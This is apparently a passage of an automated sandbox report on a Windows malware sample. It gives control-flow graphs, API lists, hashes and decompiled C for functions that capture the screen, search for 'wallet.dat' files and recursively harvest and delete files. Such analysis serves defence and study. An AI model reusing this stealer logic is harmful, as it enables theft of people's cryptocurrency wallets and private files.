                                                                                                                                                                        control_flow_graph 1302 408add-408c73 GetDesktopWindow LoadLibraryW 1322 408c79-408cc9 GetClientRect SetStretchBltMode StretchBlt 1302->1322 1323 408f6c-408f9f DeleteObject * 2 1302->1323 1322->1323 1328 408ccf-408cee 1322->1328 1328->1323 1330 408cf4-408d29 SelectObject 1328->1330 1330->1323 1332 408d2f-408d5a GetObjectW call 40a69e 1330->1332 1336 408d60-408d6f call 4089b2 1332->1336 1337 408f62 1332->1337 1341 408fa2-408fa3 1336->1341 1342 408d75-408dfa CreateFileW call 40a503 1336->1342 1338 408f66 LocalFree 1337->1338 1338->1323 1341->1338 1350 408e45-408e5f LocalFree CloseHandle DeleteFileW LocalFree 1342->1350 1351 408dfc-408e18 1342->1351 1352 408e65-408f01 LocalFree call 40a05f call 40a503 call 408619 1350->1352 1351->1350 1354 408e1a-408e43 1351->1354 1366 408f40-408f5c LocalFree * 4 1352->1366 1367 408f03-408f1c 1352->1367 1354->1352 1366->1337 1367->1366 1369 408f1e-408f38 call 407edb 1367->1369 1371 408f3d 1369->1371 1371->1366
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00408B01
                                                                                                                                                                        • LoadLibraryW.KERNEL32 ref: 00408B16
                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00408C7F
                                                                                                                                                                        • SetStretchBltMode.GDI32(?,00000004), ref: 00408C88
                                                                                                                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00CC0020), ref: 00408CC5
                                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00408CFA
                                                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00408D37
                                                                                                                                                                          • Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701
                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000004,00000000,00000000), ref: 00408D9E
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00408E46
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00408E51
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00408E58
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00408E5F
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00408E69
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00408F41
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00408F4B
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00408F55
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00408F5C
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00408F66
                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00408F6D
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00408F77
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$Object$Delete$FileStretchlstrlen$AllocClientCloseCreateDesktopGlobalHandleLibraryLoadModeRectSelectWindow
                                                                                                                                                                        • String ID: x[m
                                                                                                                                                                        • API String ID: 2597395389-3488577920
                                                                                                                                                                        • Opcode ID: deff7585ebf4a3cada0b4e5203a5cf84e0c26f1f4b35f6455ec07dc6f0e53994
                                                                                                                                                                        • Instruction ID: 01ed2ab5b407dfc10e46f60f726f8b4f8e8024e8c2023dc9817dc03e66c0134a
                                                                                                                                                                        • Opcode Fuzzy Hash: deff7585ebf4a3cada0b4e5203a5cf84e0c26f1f4b35f6455ec07dc6f0e53994
                                                                                                                                                                        • Instruction Fuzzy Hash: 53D12E71104211AFE705DFA6DE44E2B7BF9EB89710F004D3DFA54E72A0DB7499208B6A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1372 40ae06-40ae1c 1373 40ae26-40ae59 LocalAlloc SHGetSpecialFolderPathW 1372->1373 1374 40ae1e-40ae21 1372->1374 1377 40ae73-40aea6 call 40a503 FindFirstFileW 1373->1377 1378 40ae5b-40ae66 1373->1378 1375 40b172-40b176 1374->1375 1385 40aea8-40aeb8 LocalFree * 2 1377->1385 1386 40aebd-40aec4 1377->1386 1378->1377 1381 40ae68-40ae71 1378->1381 1381->1377 1385->1375 1387 40aec6-40aedb 1386->1387 1388 40af38-40af4d 1386->1388 1387->1388 1391 40aedd-40aef2 1387->1391 1392 40b141-40b152 FindNextFileW 1388->1392 1393 40af53-40afb2 SHGetSpecialFolderPathW 1388->1393 1391->1388 1397 40aef4-40af2a LocalAlloc call 40ae06 1391->1397 1392->1386 1394 40b158-40b171 LocalFree * 2 FindClose 1392->1394 1405 40afb4-40afb5 1393->1405 1406 40afb7 1393->1406 1394->1375 1402 40af2f-40af33 1397->1402 1404 40b13b LocalFree 1402->1404 1404->1392 1407 40afba-40afd0 call 40a2aa 1405->1407 1406->1407 1411 40b120-40b123 1407->1411 1412 40afd6-40b03b call 40a503 * 2 1407->1412 1413 40b126-40b138 LocalFree * 2 1411->1413 1422 40b041-40b05c 1412->1422 1423 40b117-40b11e LocalFree 1412->1423 1413->1404 1422->1423 1425 40b062-40b080 call 40a69e 1422->1425 1423->1413 1429 40b106-40b115 DeleteFileW LocalFree 1425->1429 1430 40b086-40b095 1425->1430 1431 40b0fb-40b104 LocalFree 1429->1431 1430->1429 1433 40b097-40b0fa GetFileSize 1430->1433 1431->1413 1433->1431
                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,0000020A,00000000,00000000,00000000), ref: 0040AE32
                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 0040AE4E
                                                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 0040AE9C
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040AEA9
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040AEB0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$AllocFileFindFirstFolderPathSpecial
                                                                                                                                                                        • String ID: 8\m$wallet.dat
                                                                                                                                                                        • API String ID: 1477829390-3199543499
                                                                                                                                                                        • Opcode ID: d18511dcb49cecff3af7a8a3a4a2ac7ba367992507ce9e77723320c17dcaae13
                                                                                                                                                                        • Instruction ID: c428bda3d7e2fbc090b10557d15fab42b18105d23257a4f21a5ceef78d5d1267
                                                                                                                                                                        • Opcode Fuzzy Hash: d18511dcb49cecff3af7a8a3a4a2ac7ba367992507ce9e77723320c17dcaae13
                                                                                                                                                                        • Instruction Fuzzy Hash: 4BA1B471A00215AFDB14DBA6DD89FAF77B5EB48310F004429F615BB2D0DBB89D10CBA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1437 40b177-40b1d9 call 40188c FindFirstFileW 1442 40b4e6-40b4ee 1437->1442 1443 40b1df 1437->1443 1444 40b1e1-40b1e6 1443->1444 1445 40b26c-40b27a call 40a70e 1444->1445 1446 40b1ec-40b1f2 1444->1446 1448 40b4c0-40b4cf 1445->1448 1453 40b280-40b28e call 40a70e 1445->1453 1446->1448 1449 40b1f8-40b206 call 40a70e 1446->1449 1448->1444 1455 40b4d5-40b4e0 LocalFree FindClose 1448->1455 1449->1448 1457 40b20c-40b21a call 40a70e 1449->1457 1453->1448 1461 40b294-40b2d8 call 40a69e 1453->1461 1455->1442 1457->1448 1462 40b220-40b267 call 40b177 LocalFree 1457->1462 1472 40b4a3-40b4b2 LocalFree * 2 DeleteFileW 1461->1472 1473 40b2de-40b2eb 1461->1473 1462->1448 1474 40b4b8-40b4bc 1472->1474 1473->1472 1476 40b2f1-40b3ca GetFileSize call 40a503 * 3 call 40a2aa call 40a503 1473->1476 1474->1448 1494 40b3d0-40b3ea 1476->1494 1495 40b482-40b4a1 LocalFree * 4 1476->1495 1498 40b431-40b47e 1494->1498 1499 40b3ec-40b422 LocalFree * 5 CloseHandle DeleteFileW 1494->1499 1496 40b428-40b42c 1495->1496 1496->1474 1498->1495 1499->1496
                                                                                                                                                                        C-Code - Quality: 27%
                                                                                                                                                                        			E0040B177(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                        				char _v568;
                                                                                                                                                                        				struct _WIN32_FIND_DATAW _v616;
                                                                                                                                                                        				WCHAR* _v632;
                                                                                                                                                                        				void* _v640;
                                                                                                                                                                        				signed int _v648;
                                                                                                                                                                        				void* _v660;
                                                                                                                                                                        				void* _v664;
                                                                                                                                                                        				intOrPtr _v684;
                                                                                                                                                                        				void* _v688;
                                                                                                                                                                        				WCHAR* _v696;
                                                                                                                                                                        				void* _v716;
                                                                                                                                                                        				void* _v732;
                                                                                                                                                                        				intOrPtr _v748;
                                                                                                                                                                        				intOrPtr _v760;
                                                                                                                                                                        				char _v764;
                                                                                                                                                                        				intOrPtr _v772;
                                                                                                                                                                        				intOrPtr _v780;
                                                                                                                                                                        				intOrPtr _v788;
                                                                                                                                                                        				signed int _v800;
                                                                                                                                                                        				void* _v804;
                                                                                                                                                                        				void* _v812;
                                                                                                                                                                        				void* _v816;
                                                                                                                                                                        				void* _v820;
                                                                                                                                                                        				void* _v824;
                                                                                                                                                                        				void* _v828;
                                                                                                                                                                        				void* _v836;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t66;
                                                                                                                                                                        				void* _t70;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        				void* _t86;
                                                                                                                                                                        				void* _t89;
                                                                                                                                                                        				void* _t96;
                                                                                                                                                                        				void* _t98;
                                                                                                                                                                        				void* _t99;
                                                                                                                                                                        				void* _t100;
                                                                                                                                                                        				void* _t102;
                                                                                                                                                                        				intOrPtr _t103;
                                                                                                                                                                        				void* _t116;
                                                                                                                                                                        				void* _t117;
                                                                                                                                                                        				void* _t127;
                                                                                                                                                                        				WCHAR* _t128;
                                                                                                                                                                        				void* _t130;
                                                                                                                                                                        				WCHAR* _t132;
                                                                                                                                                                        				intOrPtr _t172;
                                                                                                                                                                        				intOrPtr _t173;
                                                                                                                                                                        				intOrPtr _t177;
                                                                                                                                                                        				void* _t182;
                                                                                                                                                                        				void* _t183;
                                                                                                                                                                        				void* _t185;
                                                                                                                                                                        				void* _t189;
                                                                                                                                                                        				signed int _t190;
                                                                                                                                                                        				void* _t192;
                                                                                                                                                                        				void* _t194;
                                                                                                                                                                        				signed int _t196;
                                                                                                                                                                        				void* _t198;
                                                                                                                                                                        
                                                                                                                                                                        				_t198 = (_t196 & 0xfffffff8) - 0x28c;
                                                                                                                                                                        				_t183 = __edx;
                                                                                                                                                                        				_t190 = __ecx;
                                                                                                                                                                        				_v640 = __edx;
                                                                                                                                                                        				_v648 = __ecx;
                                                                                                                                                                        				_t66 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a, _t182, _t189, _t127);
                                                                                                                                                                        				_t128 =  *((intOrPtr*)( *0x40e13c))(_t66, _a4);
                                                                                                                                                                        				_v632 = _t128;
                                                                                                                                                                        				E0040188C(_t128, _t128, 0x104, __ecx,  *0x40e1d0);
                                                                                                                                                                        				_t70 = FindFirstFileW(_t128,  &_v616); // executed
                                                                                                                                                                        				_v664 = _t70;
                                                                                                                                                                        				if(_t70 == 0xffffffff) {
                                                                                                                                                                        					L21:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t130 = _t70;
                                                                                                                                                                        				do {
                                                                                                                                                                        					if((_v616.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                        						if(E0040A70E( &_v568, _a8) == 0 || E0040A70E( &_v568, _a12) != 0) {
                                                                                                                                                                        							goto L19;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t86 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        							_t185 =  *((intOrPtr*)( *0x40e000))(_t86, _a4,  &(_v616.dwReserved1));
                                                                                                                                                                        							_v660 = _t185;
                                                                                                                                                                        							_v696 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        							_t89 = E0040A69E( *0x40e044,  &_v696);
                                                                                                                                                                        							_t132 = _v696;
                                                                                                                                                                        							if(_t89 == 0) {
                                                                                                                                                                        								L17:
                                                                                                                                                                        								LocalFree(_t132);
                                                                                                                                                                        								LocalFree(_t185);
                                                                                                                                                                        								DeleteFileW(_t132);
                                                                                                                                                                        								L18:
                                                                                                                                                                        								_t130 = _v688;
                                                                                                                                                                        								_t183 = _v684;
                                                                                                                                                                        								goto L19;
                                                                                                                                                                        							}
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							_push(_t132);
                                                                                                                                                                        							_push(_t185);
                                                                                                                                                                        							if( *((intOrPtr*)( *0x40e184))() == 0) {
                                                                                                                                                                        								goto L17;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t96 =  *((intOrPtr*)( *0x40e03c))(_t132, 0x80000000, 1, 0, 4, 0, 0);
                                                                                                                                                                        							_v716 = _t96;
                                                                                                                                                                        							GetFileSize(_t96, 0);
                                                                                                                                                                        							_t98 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
                                                                                                                                                                        							_t99 =  *((intOrPtr*)( *0x40e13c))(_t98,  *0x40e1b8);
                                                                                                                                                                        							_t172 =  *0x40e1b4; // 0x6eedc0
                                                                                                                                                                        							_t100 = E0040A503(_t99, _t172);
                                                                                                                                                                        							_t173 =  *0x40e1b8; // 0x6d5c58
                                                                                                                                                                        							_t102 = E0040A503(E0040A503(_t100, _t173), _t190);
                                                                                                                                                                        							_t103 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
                                                                                                                                                                        							_v760 = _t103;
                                                                                                                                                                        							E0040A2AA(_t185 +  *((intOrPtr*)( *0x40e08c))(0) * 2,  &_v764, _v748);
                                                                                                                                                                        							_t194 = E0040A503(_t102, _v764);
                                                                                                                                                                        							_v732 = _t194;
                                                                                                                                                                        							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t194, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        							_v772 = 0;
                                                                                                                                                                        							 *((intOrPtr*)( *0x40e044))(0x40, 0x144);
                                                                                                                                                                        							_t177 = _v780;
                                                                                                                                                                        							_v788 = 0;
                                                                                                                                                                        							if(_t177 == 0) {
                                                                                                                                                                        								L16:
                                                                                                                                                                        								LocalFree(_t132);
                                                                                                                                                                        								LocalFree(_t194);
                                                                                                                                                                        								LocalFree(_v804);
                                                                                                                                                                        								LocalFree(_t185);
                                                                                                                                                                        								L14:
                                                                                                                                                                        								_t190 = _v800;
                                                                                                                                                                        								goto L18;
                                                                                                                                                                        							}
                                                                                                                                                                        							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t194, 0xffffffff, 0, _t177, 0, 0);
                                                                                                                                                                        							if(0 != 0) {
                                                                                                                                                                        								_t116 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        								_v804 = _v828;
                                                                                                                                                                        								_v800 = _v824;
                                                                                                                                                                        								_t117 =  *((intOrPtr*)( *0x40e13c))(_t116, _t132);
                                                                                                                                                                        								_t160 = _a20;
                                                                                                                                                                        								_v800 = _v800 & 0x00000000;
                                                                                                                                                                        								_v804 = _t117;
                                                                                                                                                                        								 *_t160 =  *_a20 + 1;
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								_t185 = _v824;
                                                                                                                                                                        								_t194 = _v820;
                                                                                                                                                                        								goto L16;
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_t194);
                                                                                                                                                                        							LocalFree(_v820);
                                                                                                                                                                        							LocalFree(_v836);
                                                                                                                                                                        							LocalFree(_t132);
                                                                                                                                                                        							LocalFree(_t185);
                                                                                                                                                                        							CloseHandle(_v816);
                                                                                                                                                                        							DeleteFileW(_t132);
                                                                                                                                                                        							goto L14;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_v568 != 0x2e && E0040A70E( &_v568, _a8) != 0 && E0040A70E( &_v568, _a12) == 0) {
                                                                                                                                                                        						_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        						_t192 =  *((intOrPtr*)( *0x40e000))(_t78, _a4,  &(_v616.dwReserved1));
                                                                                                                                                                        						E0040B177(_v684, _t183, _t192, _a8, _a12, _a16, _a20);
                                                                                                                                                                        						_t198 = _t198 + 0x14;
                                                                                                                                                                        						LocalFree(_t192);
                                                                                                                                                                        						_t190 = _v684;
                                                                                                                                                                        					}
                                                                                                                                                                        					L19:
                                                                                                                                                                        					_push( &(_v616.ftCreationTime));
                                                                                                                                                                        					_push(_t130);
                                                                                                                                                                        				} while ( *((intOrPtr*)( *0x40e148))() != 0);
                                                                                                                                                                        				LocalFree(_v640);
                                                                                                                                                                        				FindClose(_t130);
                                                                                                                                                                        				goto L21;
                                                                                                                                                                        			}




























































                                                                                                                                                                        0x0040b17d
                                                                                                                                                                        0x0040b190
                                                                                                                                                                        0x0040b192
                                                                                                                                                                        0x0040b196
                                                                                                                                                                        0x0040b19a
                                                                                                                                                                        0x0040b19e
                                                                                                                                                                        0x0040b1b2
                                                                                                                                                                        0x0040b1bb
                                                                                                                                                                        0x0040b1bf
                                                                                                                                                                        0x0040b1d0
                                                                                                                                                                        0x0040b1d2
                                                                                                                                                                        0x0040b1d9
                                                                                                                                                                        0x0040b4e6
                                                                                                                                                                        0x0040b4ee
                                                                                                                                                                        0x0040b4ee
                                                                                                                                                                        0x0040b1df
                                                                                                                                                                        0x0040b1e1
                                                                                                                                                                        0x0040b1e6
                                                                                                                                                                        0x0040b27a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b294
                                                                                                                                                                        0x0040b2a1
                                                                                                                                                                        0x0040b2ba
                                                                                                                                                                        0x0040b2bf
                                                                                                                                                                        0x0040b2c9
                                                                                                                                                                        0x0040b2cd
                                                                                                                                                                        0x0040b2d2
                                                                                                                                                                        0x0040b2d8
                                                                                                                                                                        0x0040b4a3
                                                                                                                                                                        0x0040b4a4
                                                                                                                                                                        0x0040b4ab
                                                                                                                                                                        0x0040b4b2
                                                                                                                                                                        0x0040b4b8
                                                                                                                                                                        0x0040b4b8
                                                                                                                                                                        0x0040b4bc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b4bc
                                                                                                                                                                        0x0040b2e3
                                                                                                                                                                        0x0040b2e5
                                                                                                                                                                        0x0040b2e6
                                                                                                                                                                        0x0040b2eb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b305
                                                                                                                                                                        0x0040b30a
                                                                                                                                                                        0x0040b30e
                                                                                                                                                                        0x0040b321
                                                                                                                                                                        0x0040b330
                                                                                                                                                                        0x0040b332
                                                                                                                                                                        0x0040b33a
                                                                                                                                                                        0x0040b33f
                                                                                                                                                                        0x0040b350
                                                                                                                                                                        0x0040b364
                                                                                                                                                                        0x0040b372
                                                                                                                                                                        0x0040b37f
                                                                                                                                                                        0x0040b396
                                                                                                                                                                        0x0040b39a
                                                                                                                                                                        0x0040b3ab
                                                                                                                                                                        0x0040b3ba
                                                                                                                                                                        0x0040b3be
                                                                                                                                                                        0x0040b3c0
                                                                                                                                                                        0x0040b3c4
                                                                                                                                                                        0x0040b3ca
                                                                                                                                                                        0x0040b482
                                                                                                                                                                        0x0040b483
                                                                                                                                                                        0x0040b48a
                                                                                                                                                                        0x0040b494
                                                                                                                                                                        0x0040b49b
                                                                                                                                                                        0x0040b428
                                                                                                                                                                        0x0040b428
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b428
                                                                                                                                                                        0x0040b3e6
                                                                                                                                                                        0x0040b3ea
                                                                                                                                                                        0x0040b43d
                                                                                                                                                                        0x0040b44a
                                                                                                                                                                        0x0040b453
                                                                                                                                                                        0x0040b457
                                                                                                                                                                        0x0040b459
                                                                                                                                                                        0x0040b460
                                                                                                                                                                        0x0040b465
                                                                                                                                                                        0x0040b474
                                                                                                                                                                        0x0040b476
                                                                                                                                                                        0x0040b477
                                                                                                                                                                        0x0040b478
                                                                                                                                                                        0x0040b479
                                                                                                                                                                        0x0040b47a
                                                                                                                                                                        0x0040b47e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b47e
                                                                                                                                                                        0x0040b3ed
                                                                                                                                                                        0x0040b3f8
                                                                                                                                                                        0x0040b402
                                                                                                                                                                        0x0040b409
                                                                                                                                                                        0x0040b410
                                                                                                                                                                        0x0040b41b
                                                                                                                                                                        0x0040b422
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b422
                                                                                                                                                                        0x0040b27a
                                                                                                                                                                        0x0040b1f2
                                                                                                                                                                        0x0040b22c
                                                                                                                                                                        0x0040b246
                                                                                                                                                                        0x0040b254
                                                                                                                                                                        0x0040b259
                                                                                                                                                                        0x0040b25d
                                                                                                                                                                        0x0040b263
                                                                                                                                                                        0x0040b263
                                                                                                                                                                        0x0040b4c0
                                                                                                                                                                        0x0040b4c9
                                                                                                                                                                        0x0040b4ca
                                                                                                                                                                        0x0040b4cd
                                                                                                                                                                        0x0040b4d9
                                                                                                                                                                        0x0040b4e0
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 0040B1D0
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040B30E
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040B3ED
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040B3F8
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040B402
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040B409
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040B410
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040B41B
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0040B422
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040B483
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040B48A
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040B494
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040B49B
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040B4A4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040B4AB
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0040B4B2
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040B4D9
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B4E0
                                                                                                                                                                          • Part of subcall function 0040A70E: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A741
                                                                                                                                                                          • Part of subcall function 0040A70E: LocalFree.KERNEL32(?), ref: 0040A7C2
                                                                                                                                                                          • Part of subcall function 0040B177: LocalFree.KERNEL32(00000000), ref: 0040B25D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$File$CloseDeleteFind$AllocFirstHandleSize
                                                                                                                                                                        • String ID: .$X\m
                                                                                                                                                                        • API String ID: 322622607-3491835556
                                                                                                                                                                        • Opcode ID: 48fb149053ef200d459f7f380ceaf91d03eb9e8f41a1b2d18255321c7608b971
                                                                                                                                                                        • Instruction ID: d7038f412777c1620d74c121b4857271da971a97c01f51cff95b18f8f793f09e
                                                                                                                                                                        • Opcode Fuzzy Hash: 48fb149053ef200d459f7f380ceaf91d03eb9e8f41a1b2d18255321c7608b971
                                                                                                                                                                        • Instruction Fuzzy Hash: A5A1B171204301AFD704DF62DD88E6B77A9EF88704F004D29FA55A72A1DB74ED10CBAA
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E00403C8F(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a12) {
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                        				void* _v40;
                                                                                                                                                                        				void* _v44;
                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                        				struct _WIN32_FIND_DATAW _v640;
                                                                                                                                                                        				void* _t60;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				void* _t63;
                                                                                                                                                                        				void* _t66;
                                                                                                                                                                        				void* _t70;
                                                                                                                                                                        				signed int _t77;
                                                                                                                                                                        				signed int _t86;
                                                                                                                                                                        				signed int _t91;
                                                                                                                                                                        				void* _t93;
                                                                                                                                                                        				void* _t94;
                                                                                                                                                                        				void* _t96;
                                                                                                                                                                        				WCHAR* _t97;
                                                                                                                                                                        				void* _t98;
                                                                                                                                                                        				int _t101;
                                                                                                                                                                        				signed int _t103;
                                                                                                                                                                        				void* _t105;
                                                                                                                                                                        				void* _t107;
                                                                                                                                                                        				void* _t109;
                                                                                                                                                                        				void* _t111;
                                                                                                                                                                        				signed int _t123;
                                                                                                                                                                        				void* _t124;
                                                                                                                                                                        				void* _t125;
                                                                                                                                                                        				void* _t127;
                                                                                                                                                                        				signed int _t160;
                                                                                                                                                                        				intOrPtr _t173;
                                                                                                                                                                        				void* _t181;
                                                                                                                                                                        				void* _t186;
                                                                                                                                                                        				signed int _t189;
                                                                                                                                                                        				void* _t191;
                                                                                                                                                                        				void* _t192;
                                                                                                                                                                        				void* _t193;
                                                                                                                                                                        				void* _t194;
                                                                                                                                                                        
                                                                                                                                                                        				_v36 = __edx;
                                                                                                                                                                        				_v28 = __ecx;
                                                                                                                                                                        				_t60 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e1a8);
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					_t124 = _t60;
                                                                                                                                                                        					if(_t124 == 0) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t125 = _t124 + 8;
                                                                                                                                                                        					_t62 =  *((intOrPtr*)( *0x40e18c))(_t125,  *0x40e1f0);
                                                                                                                                                                        					_t3 = _t62 + 2; // 0x2
                                                                                                                                                                        					_t63 =  *((intOrPtr*)( *0x40e18c))(_t3,  *0x40e1e8);
                                                                                                                                                                        					_v24 = _t63;
                                                                                                                                                                        					_t66 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t64);
                                                                                                                                                                        					_v12 = _t66;
                                                                                                                                                                        					_t70 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t68);
                                                                                                                                                                        					_v16 = _t70;
                                                                                                                                                                        					_t186 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t71);
                                                                                                                                                                        					_v20 = _t186;
                                                                                                                                                                        					_v32 = _v24 - _t125 >> 1;
                                                                                                                                                                        					_t77 = E0040A3E4(_t125,  &_v12, _t3 - _t125 >> 1, _v24 - _t125 >> 1);
                                                                                                                                                                        					__eflags = _t77;
